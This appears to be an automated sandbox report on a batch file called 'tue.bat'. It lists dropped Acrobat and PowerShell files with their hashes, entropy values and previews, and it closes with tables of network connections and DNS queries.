                                                                Size (bytes):4
                                                                Entropy (8bit):0.8112781244591328
                                                                Encrypted:false
                                                                SSDEEP:3:e:e
                                                                MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                                SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                                SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                                SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                                Malicious:false
                                                                Preview:....
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                File Type:JSON data
                                                                Category:dropped
                                                                Size (bytes):2818
                                                                Entropy (8bit):5.132963007489771
                                                                Encrypted:false
                                                                SSDEEP:48:Y5UtDyLH1BcycRDL+khpZxNHKVEwMSg9p3:8Wuv+RDL+khpZx5+EwMTp3
                                                                MD5:9738C9A4645802D6657C379C5ADA445A
                                                                SHA1:23A90A43874551DE3DDEC58BD60771EC476793DC
                                                                SHA-256:16C602130D4995D2200ECF3C25A1F0D55EF8AA0E954E6274BAB44CD63FFCB5F7
                                                                SHA-512:AF1370D5226E072637633C29B2607E078FFF7B1DE5CD8658AD128A27891F78A0CED6AFC4F1D1AF1CA7D4517C92DD2056E8E4A3AF01CCC883191CFFEE41A06AC1
                                                                Malicious:false
                                                                Preview:{"all":[{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"83b23d975e1d1cb439003c14ff9e4405","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":1164,"ts":1729878444000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"39f7a42361cc93b4b543029ded3da0e4","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1026,"ts":1729878444000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"954c2106ae1d7cf6880827d428fdb7ba","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1055,"ts":1729878444000},{"id":"DC_Reader_Edit_LHP_Banner","info":{"dg":"3e68910506edc9decf051c53963626be","sid":"DC_Reader_Edit_LHP_Banner"},"mimeType":"file","size":1038,"ts":1729878444000},{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"25418f7fee4d80cd29846f150e10f89a","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":1050,"ts":1729878444000},{"id":"Edit_InApp_Aug2020","info":{"dg":"fb85d76bee632ddb905e11eee22b471e","sid":"Edit_InApp_Aug2020"},"mimeType":"file","size":782,"ts":17
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25
                                                                Category:dropped
                                                                Size (bytes):12288
                                                                Entropy (8bit):1.454404832102148
                                                                Encrypted:false
                                                                SSDEEP:48:TGufl2GL7msCvrBd6dHtbGIbPe0K3+fDy2dsflZ:lNVmsw3SHtbDbPe0K3+fDZdU
                                                                MD5:EECD38F7E440759865A26A044354320F
                                                                SHA1:79B8A5496D74C489C13F7294CBC273C4DDE7BF7D
                                                                SHA-256:0800969D6C8AAFD1FAD07AFCBEBF124C95252851F70D06711A5B236BE9DECC4C
                                                                SHA-512:489DA946E96519702BB35770436CAD5EAA7236C81E406CF842750215810D31FD4FB14E2427C5D3B7C9C814BE801BFC6E78B50880F3989EA394F8CEF13BDAB3D5
                                                                Malicious:false
                                                                Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                File Type:SQLite Rollback Journal
                                                                Category:dropped
                                                                Size (bytes):8720
                                                                Entropy (8bit):1.957028525458673
                                                                Encrypted:false
                                                                SSDEEP:48:7MzrvrBd6dHtbGIbPe0K3+fDy2dsWsqFl2GL7msz:7K3SHtbDbPe0K3+fDZdIKVmsz
                                                                MD5:223506A4DF695285EC779A9B95079FB1
                                                                SHA1:E3923A27908447AE04467ED82C5CDC277B055DB3
                                                                SHA-256:8A6D26D24E66EAEB17992C8780298E4BA5124408BA97193A4A559B4DCA1E0D86
                                                                SHA-512:592B3310D52EDB19660733C4C02857CACE7881FDF6AD7C1D89E3C6F570D299C78D44EDBA0489C6BAB7B7539E77BF7ED5634B32F73FEBCAA1194C6847C2AD100F
                                                                Malicious:false
                                                                Preview:.... .c.....V.0q......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................v.../.././././....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):64
                                                                Entropy (8bit):0.34726597513537405
                                                                Encrypted:false
                                                                SSDEEP:3:Nlll:Nll
                                                                MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                Malicious:false
                                                                Preview:@...e...........................................................
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):246
                                                                Entropy (8bit):3.5193370621730837
                                                                Encrypted:false
                                                                SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8jq7CH:Qw946cPbiOxDlbYnuRKM
                                                                MD5:2DF0E0B782C1D946ED19800782109E69
                                                                SHA1:D6C133BB3581E4888FA3240EA1413C25BA6880CA
                                                                SHA-256:75AB3BCAB62DDC5FACF10F662017460F563D5734FF1431597D476E92241279E9
                                                                SHA-512:C6D30C0C4C1A5C5FEBE4576896BA9B22A1206A2D70431C55FFBF096648FB1FBFE6BB51DA6D256F9205F1CC3DAD55A327756F0A22ACC473FF1B0381F72D94C94E
                                                                Malicious:false
                                                                Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .2.5./.1.0./.2.0.2.4. . .1.3.:.4.7.:.2.3. .=.=.=.....
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                File Type:ASCII text, with very long lines (393)
                                                                Category:dropped
                                                                Size (bytes):16525
                                                                Entropy (8bit):5.386483451061953
                                                                Encrypted:false
                                                                SSDEEP:384:A2+jkjVj8jujXj+jPjghjKj0jLjmF/FRFO7t75NsXNsbNsgNssNsNNsaNsliNsTY:AXg5IqTS7Mh+oXChrYhFiQHXiz1W60ID
                                                                MD5:F49CA270724D610D1589E217EA78D6D1
                                                                SHA1:22D43D4BB9BDC1D1DEA734399D2D71E264AA3DD3
                                                                SHA-256:D2FFBB2EF8FCE09991C2EFAA91B6784497E8C55845807468A3385CF6029A2F8D
                                                                SHA-512:181B42465DE41E298329CBEB80181CBAB77CFD1701DBA31E61B2180B483BC35E2EFAFFA14C98F1ED0EDDE67F997EE4219C5318CE846BB0116A908FB2EAB61D29
                                                                Malicious:false
                                                                Preview:SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:808+0200 ThreadID=6044 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:809+0200 ThreadID=6044 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:809+0200 ThreadID=6044 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:809+0200 ThreadID=6044 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:809+0200 ThreadID=6044 Component=ngl-lib_NglAppLib Description="SetConfig:
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):15114
                                                                Entropy (8bit):5.381725227151002
                                                                Encrypted:false
                                                                SSDEEP:384:SvbWbbPkdzgQ9Txaf9/zbs7UNM0B1u++lyXrFN9HXD1cyib3XshGtutkxukAJkM/:s14
                                                                MD5:AD7436C6D4A7BDA8FE69CC0A189DF468
                                                                SHA1:3DC005F39A968EE879B34C6932CC79D79EAB66D1
                                                                SHA-256:17BA2E244EBBC4F02BA35B04C77F6A316D13BF162E4CD40EF7628B400D7AF0DE
                                                                SHA-512:0DBABE3D6153D3A9C771B0798C351840F3674864E1D3D74A67FD8E75DB82A823668DFF860BD950CBA20A92F34A05989DEFF00ACD38B950903285D952A75F12AD
                                                                Malicious:false
                                                                Preview:SessionID=fc18534a-05ed-42ab-b51f-02ff86c9f6b4.1729878435347 Timestamp=2024-10-25T13:47:15:347-0400 ThreadID=7356 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=fc18534a-05ed-42ab-b51f-02ff86c9f6b4.1729878435347 Timestamp=2024-10-25T13:47:15:348-0400 ThreadID=7356 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=fc18534a-05ed-42ab-b51f-02ff86c9f6b4.1729878435347 Timestamp=2024-10-25T13:47:15:348-0400 ThreadID=7356 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=fc18534a-05ed-42ab-b51f-02ff86c9f6b4.1729878435347 Timestamp=2024-10-25T13:47:15:348-0400 ThreadID=7356 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=fc18534a-05ed-42ab-b51f-02ff86c9f6b4.1729878435347 Timestamp=2024-10-25T13:47:15:348-0400 ThreadID=7356 Component=ngl-lib_NglAppLib Description="SetConf
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):35721
                                                                Entropy (8bit):5.412051909556827
                                                                Encrypted:false
                                                                SSDEEP:768:hRDD/ATOlQwlgR6RgRT4xk1Bh9+R6gRldy0+AyxkHBDgRh9gRV:hRDD/ATOlQwlgR6RgRT4xk1Bh9+R6gRH
                                                                MD5:693C7E1C2C1E864E79A478497CA4DE56
                                                                SHA1:1FB1280B924AEF2B4092C286130215E48B77E6A0
                                                                SHA-256:6E932AE60A25053E5A005AB63354EBD658F473D663770A51CE629164B22358AD
                                                                SHA-512:3486D68005A4728ADAB1FB1E72F13427FA9638631ACD23F0E44288BEF464D22BA5BDEABD597DAF2FDEB801FD9FBC78F6FAA1E87A338E6D50476F73967CCC319F
                                                                Malicious:false
                                                                Preview:05-10-2023 08:41:17:.---2---..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : Starting NGL..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..05-10-2023 08:41:17:.Closing File..05-10-
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                                Category:dropped
                                                                Size (bytes):1419751
                                                                Entropy (8bit):7.976496077007677
                                                                Encrypted:false
                                                                SSDEEP:24576:6qWL07oXGZIZwYIGNPJNdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:ZWLxXGZIZwZGh3mlind9i4ufFXpAXkru
                                                                MD5:E726B36897E958CA051FEA78BCF29204
                                                                SHA1:1123642FB646996FEB2FD7DDCD8FE4F3C50A5949
                                                                SHA-256:CD35E76A516E66EE1994048C33D954CA73B4EC4542D15309F7923193B8ED1C39
                                                                SHA-512:0D425C0B56E1F0700124660CA9B252CAEA17A69C618E51759CC7926F09D8FF1B55F38D967C8D27D88DCAA7051B29AEF7C23083B3C460F4B822AE0D80A9440773
                                                                Malicious:false
                                                                Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                                Category:dropped
                                                                Size (bytes):758601
                                                                Entropy (8bit):7.98639316555857
                                                                Encrypted:false
                                                                SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                                MD5:3A49135134665364308390AC398006F1
                                                                SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                                SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                                SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                                Malicious:false
                                                                Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                                Category:dropped
                                                                Size (bytes):386528
                                                                Entropy (8bit):7.9736851559892425
                                                                Encrypted:false
                                                                SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                                MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                                SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                                SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                                SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                                Malicious:false
                                                                Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 42290
                                                                Category:dropped
                                                                Size (bytes):1407294
                                                                Entropy (8bit):7.97605879016224
                                                                Encrypted:false
                                                                SSDEEP:24576:/VRbdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07WWL07oXGZnYIGNPJF:tRb3mlind9i4ufFXpAXkrfUs0qWLxXGY
                                                                MD5:9543A6C1DE815E938F6AA0F90F2EF0C6
                                                                SHA1:62B527E0463D71548862DE000950E638F3721582
                                                                SHA-256:8A4B4F588D79D2AF9E617936932D8264DF9017D80A68F8D39E5EA36B14D76F1D
                                                                SHA-512:50A26B895BA1F40B2ADE59996A1A89EBAFE67CB9F7B4F3A029382B6966E75F8BAD3551D25F29391C58A7EDC206F7DAF1D07F68F5E458E3A5D02556EACA377B0D
                                                                Malicious:false
                                                                Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                                Process:C:\Windows\System32\timeout.exe
                                                                File Type:ASCII text, with CRLF line terminators, with overstriking
                                                                Category:dropped
                                                                Size (bytes):64
                                                                Entropy (8bit):4.4936933125951875
                                                                Encrypted:false
                                                                SSDEEP:3:hYFJAR+mQRKVxLZRtWcyn:hYFDaNZiRn
                                                                MD5:1E2AC613338A8A1B2FAA866942CF7289
                                                                SHA1:57BDF3D09C298EF7626707C60DFAC8E2E12B0405
                                                                SHA-256:D676A2AE7C46320E1591C41EFF3848BBC49C6CD99B9B95FE4E43D6126E2799AA
                                                                SHA-512:FA359C579CBC4994996634DBA18BA29187BC6742C34508D5C3F6530DC14D10807D6BBB8D95DF4225AE6F620B2B517069D0AC4DF8D757105D39FB6D302D570CFF
                                                                Malicious:false
                                                                Preview:..Waiting for 5 seconds, press a key to continue ....4.3.2.1.0..
                                                                File type:Unicode text, UTF-8 text, with very long lines (1432), with CRLF line terminators
                                                                Entropy (8bit):5.44582113711989
                                                                TrID:
                                                                  File name:tue.bat
                                                                  File size:26'531 bytes
                                                                  MD5:9b51dbe0e5610151149f3ded017ed974
                                                                  SHA1:3c4c8728103f0d8f30bec2d8ae9c495c86accf0c
                                                                  SHA256:86982da5c0cf03e1ca44f13dc50aa1f9a76743324a77719e14a33be5c119c47e
                                                                  SHA512:ac153bb04e7c812c0fc31154fa4e224dec9a1e5da42cdac27abce01d86dcef2d408ff29497ca953b73972a99c4050a0cf9307dc8579fd6666b123f0c343ae528
                                                                  SSDEEP:768:gTYcpQyuPmhDGEhtKCWeypk8CDPolD13Fg9iOUOgSKdJW7:gTYcpQyuPmhDGEhtKCuk8CDWeoOfgy
                                                                  TLSH:91C25C3751EA0326B6D500B335A4DBAEEB4C97C144F41E60F1ECA857A78EF2122D8AD5
                                                                  File Content Preview::: ............ ......... ........................... .................. ......... ...... .................. ......... ...... ........................... ......... ..................... ..:: ..................... .................. ...
                                                                  Icon Hash:9686878b929a9886
                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Oct 25, 2024 19:47:28.217170954 CEST49771443192.168.2.796.7.168.138
                                                                  Oct 25, 2024 19:47:28.217205048 CEST4434977196.7.168.138192.168.2.7
                                                                  Oct 25, 2024 19:47:28.217315912 CEST49771443192.168.2.796.7.168.138
                                                                  Oct 25, 2024 19:47:28.217634916 CEST49771443192.168.2.796.7.168.138
                                                                  Oct 25, 2024 19:47:28.217653990 CEST4434977196.7.168.138192.168.2.7
                                                                  Oct 25, 2024 19:47:28.967499018 CEST4434977196.7.168.138192.168.2.7
                                                                  Oct 25, 2024 19:47:28.967888117 CEST49771443192.168.2.796.7.168.138
                                                                  Oct 25, 2024 19:47:28.967901945 CEST4434977196.7.168.138192.168.2.7
                                                                  Oct 25, 2024 19:47:28.968933105 CEST4434977196.7.168.138192.168.2.7
                                                                  Oct 25, 2024 19:47:28.969050884 CEST49771443192.168.2.796.7.168.138
                                                                  Oct 25, 2024 19:47:28.974814892 CEST49771443192.168.2.796.7.168.138
                                                                  Oct 25, 2024 19:47:28.974814892 CEST49771443192.168.2.796.7.168.138
                                                                  Oct 25, 2024 19:47:28.974828005 CEST4434977196.7.168.138192.168.2.7
                                                                  Oct 25, 2024 19:47:28.974879026 CEST4434977196.7.168.138192.168.2.7
                                                                  Oct 25, 2024 19:47:29.087783098 CEST49771443192.168.2.796.7.168.138
                                                                  Oct 25, 2024 19:47:29.087799072 CEST4434977196.7.168.138192.168.2.7
                                                                  Oct 25, 2024 19:47:29.100502968 CEST4434977196.7.168.138192.168.2.7
                                                                  Oct 25, 2024 19:47:29.100639105 CEST49771443192.168.2.796.7.168.138
                                                                  Oct 25, 2024 19:47:29.101160049 CEST49771443192.168.2.796.7.168.138
                                                                  Oct 25, 2024 19:47:29.101178885 CEST4434977196.7.168.138192.168.2.7
                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Oct 25, 2024 19:47:23.418999910 CEST5540853192.168.2.71.1.1.1
                                                                  Oct 25, 2024 19:47:23.429461002 CEST53554081.1.1.1192.168.2.7
                                                                  Oct 25, 2024 19:47:24.088661909 CEST6050953192.168.2.71.1.1.1
                                                                  Oct 25, 2024 19:47:29.846689939 CEST5950953192.168.2.71.1.1.1
                                                                  Oct 25, 2024 19:47:29.856045961 CEST53595091.1.1.1192.168.2.7
                                                                  Oct 25, 2024 19:47:37.752759933 CEST53644071.1.1.1192.168.2.7
                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
